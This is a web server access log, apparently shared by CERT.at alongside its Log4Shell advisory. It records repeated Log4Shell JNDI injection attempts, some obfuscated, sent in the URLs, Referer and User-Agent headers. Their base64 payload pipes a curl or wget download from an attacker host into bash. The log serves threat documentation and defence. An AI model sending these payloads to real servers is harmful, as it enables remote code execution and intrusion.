195.54.160.149 - - [25/Dec/2021:14:39:09 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo} HTTP/1.1" 200 10003 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo}"
195.54.160.149 - - [25/Dec/2021:23:50:32 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==} HTTP/1.1" 301 927 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}"
195.54.160.149 - - [25/Dec/2021:23:50:32 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==} HTTP/1.1" 200 10007 "http://203.0.113.4:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}"
195.54.160.149 - - [26/Dec/2021:11:03:21 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo} HTTP/1.1" 200 10003 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo}"
195.54.160.149 - - [26/Dec/2021:20:36:48 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==} HTTP/1.1" 301 927 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}"
195.54.160.149 - - [26/Dec/2021:20:36:48 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==} HTTP/1.1" 200 10007 "http://203.0.113.4:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}"
195.54.160.149 - - [27/Dec/2021:07:42:44 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo} HTTP/1.1" 200 10003 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo}"
195.54.160.149 - - [27/Dec/2021:17:39:49 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==} HTTP/1.1" 301 927 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}"
195.54.160.149 - - [27/Dec/2021:17:39:49 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==} HTTP/1.1" 200 10007 "http://203.0.113.4:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}"
175.6.210.66 - - [27/Dec/2021:21:04:08 +0100] "GET /${jndi:ldap://121.140.99.236:1389/Exploit} HTTP/1.1" 404 5195 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
175.6.210.66 - - [27/Dec/2021:21:04:12 +0100] "GET / HTTP/1.1" 200 30307 "-" "${jndi:ldap://121.140.99.236:1389/Exploit}"
164.90.235.177 - - [27/Dec/2021:21:22:45 +0100] "GET / HTTP/1.1" 301 516 "${jndi:dns://89-22-120-248.scanworld.net/ref}" "${jndi:dns://89-22-120-248.scanworld.net/ua}"
195.54.160.149 - - [28/Dec/2021:14:14:19 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==} HTTP/1.1" 301 927 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}"
195.54.160.149 - - [28/Dec/2021:14:14:19 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==} HTTP/1.1" 200 10007 "http://203.0.113.4:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}"
195.54.160.149 - - [29/Dec/2021:01:23:22 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo} HTTP/1.1" 200 10003 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo}"

Disclaimer

Die hier angeführten Skripte und Lösungen wurden sorgfältig seitens CERT.at geprüft. Dennoch liegt die alleinige Verantwortung der Nutzung der hier angeführten Informationen beim Nutzer/Nutzerin. Jegliche Haftung der CERT.at ist explizit ausgeschlossen.

15.12.2021 12:00 Special Report: Empfehlungen zu Log4Shell